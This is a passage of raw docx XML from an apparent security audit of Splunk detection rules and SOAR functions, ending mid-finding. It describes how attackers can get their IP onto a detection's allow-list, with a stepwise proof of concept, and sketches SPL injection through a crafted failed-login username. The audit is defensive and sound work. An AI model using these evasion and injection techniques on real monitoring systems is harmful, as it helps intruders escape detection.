        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / File Management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CF-17 — Deprecated naive-UTC datetime APIs and epoch truncation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Informational (no CVSS score (informational)). Exploitability: Best practice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> playbooks/custom_functions/datetime_modify.py:37,87; indicator_get_by_tag.py:42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>utcfromtimestamp</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>utcnow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are deprecated from Python 3.12 and return naive datetimes, risking timezone-offset bugs in time-window filters; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>int(input_datetime)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> truncates fractional epochs and raises on decimal strings. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: use timezone-aware </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datetime.fromtimestamp(ts, tz=datetime.timezone.utc)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>datetime.now(datetime.timezone.utc)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; accept </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>float(input_datetime)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for epoch.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-477 Use of Obsolete Function. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-2 Flaw Remediation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SOAR custom functions / General Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.3 Detection Content, Baselines and Stories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This area produced 15 unique findings: 6 Medium, 4 Low, 5 Informational.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-03 — New-IP and spike detections write their own allow-list from attacker-influenced events (self-poisoning)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.8). Exploitability: Conditionally exploitable (detection integrity).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/cloud/detect_s3_access_from_a_new_ip.yml:12-27; detect_gcp_storage_access_from_a_new_ip.yml:24-28; detect_spike_in_s3_bucket_deletion.yml:17-26; detect_spike_in_blocked_outbound_traffic_from_your_aws.yml:15-24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location (≥3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/cloud/detect_s3_access_from_a_new_ip.yml:12-27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| inputlookup append=t previously_seen_S3_access_from_remote_ip ... | outputlookup previously_seen_S3_access_from_remote_ip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/cloud/detect_gcp_storage_access_from_a_new_ip.yml:24-28</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/cloud/detect_spike_in_s3_bucket_deletion.yml:17-26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| outputlookup s3_deletion_baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/cloud/detect_spike_in_blocked_outbound_traffic_from_your_aws.yml:15-24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| outputlookup baseline_blocked_outbound_connections</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: These Anomaly detections are "stateful": the scheduled detection search itself appends the current window's observations to a KV-store/CSV baseline and writes it back with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, then flags only rows whose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>firstTime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is within the last ~70 minutes. Because the detection unconditionally merges whatever it just saw into the "previously seen" set, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> time an attacker's IP/ARN/bucket appears it is flagged — but it is simultaneously written to the baseline, so </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>every subsequent action from the same IP is now "previously seen" and silently suppressed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. An attacker who can generate one low-and-slow event (or who front-runs the detection's own schedule) permanently whitelists their infrastructure. The detection is both the writer and the reader of the trust store (confirmed by data-flow map: writer == reader for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_S3_access_from_remote_ip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_gcp_storage_access_from_remote_ip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3_deletion_baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>baseline_blocked_outbound_connections</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = CloudTrail/S3 access/VPC-flow events (an attacker performing the very activity being detected controls the IP/ARN/bucket values). Sink = allow-list KV store consumed by the same detection on the next run. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — integrity attack on the detection, no confidentiality impact; preconditions are only that the attacker can emit the monitored event once before/with the first detection run. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Attacker accesses S3 bucket from IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> once. Detection run N: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>firstTime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the last 70 min → alert fires once, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is written to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_S3_access_from_remote_ip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Run N+1..∞: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> now has an old </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>firstTime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>newIP=0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → never alerts again. The attacker exfiltrates at leisure from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Separate the trust store from the detection. The write (baseline maintenance) must be a privileged, lower-frequency support search that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>excludes events already judged malicious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and the detection must be read-only against the baseline. Minimal fix — remove the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the detection and rely on the paired </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>___update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> baseline search, and in the baseline exclude risk/notable-tagged sources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>`aws_s3_accesslogs` http_status=200</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 stats earliest(_time) as firstTime latest(_time) as lastTime BY bucket_name remote_ip</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 lookup previously_seen_S3_access_from_remote_ip bucket_name remote_ip OUTPUT firstTime as seen</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 where isnull(seen)                         ``` read-only: never writes the alerting event back ```</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 iplocation remote_ip | rename remote_ip as src_ip</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 `detect_s3_access_from_a_new_ip_filter`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This stops self-poisoning because the detection no longer promotes the triggering event into the allow-list; promotion happens only in a governed baseline job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-349 Acceptance of Extraneous Untrusted Data With Trusted Data; CWE-345 Insufficient Verification of Data Authenticity; CWE-693 Protection Mechanism Failure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design, A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools, T1070 Indicator Removal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-4 System Monitoring, AU-6 Audit Record Review, Analysis, and Reporting, AU-12 Audit Record Generation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.CM Detect - Continuous Monitoring, DE.AE Detect - Adverse Event Analysis. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities, A.8.15 Logging. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-02 — SPL injection in potential_password_in_username via attacker-chosen username passed through map</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Conditionally exploitable (string-substitution model).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/endpoint/potential_password_in_username.yml:12-32</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>20      | eval incorrect_cred=user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>22      | map maxsearches=70 search="</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>24        ...Authentication.src=\"$src$\" Authentication.dest=\"$dest$\" sourcetype IN (\"$sourcetype$\") ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>27        | eval incorrect_cred=\"$incorrect_cred$\"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>28        | eval ut_shannon=\"$ut_shannon$\"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The outer search harvests </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>failed-authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> events and keeps the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value (an attacker-supplied login string) as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>incorrect_cred</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sourcetype</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. These are then substituted by the Splunk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command into an inner search string. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> performs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>literal `$field$` token substitution with no quoting/escaping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unless the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> modifier is used (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$field|s$</w:t>
      </w:r>
      <w:r>
        <w:t>). Here the tokens are placed inside double-quoted SPL literals (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Authentication.src=\"$src$\"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eval incorrect_cred=\"$incorrect_cred$\"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). A value containing a double quote terminates the literal early and lets the remainder of the attacker string be parsed as SPL inside the inner (map) search. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>potential_password_in_username_false_positive_reduction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> macro expands to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>search *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and does not sanitize. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = the username field of a failed login (fully attacker-controlled — an attacker simply attempts a login with a crafted username). Sink = inner SPL compiled and run by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
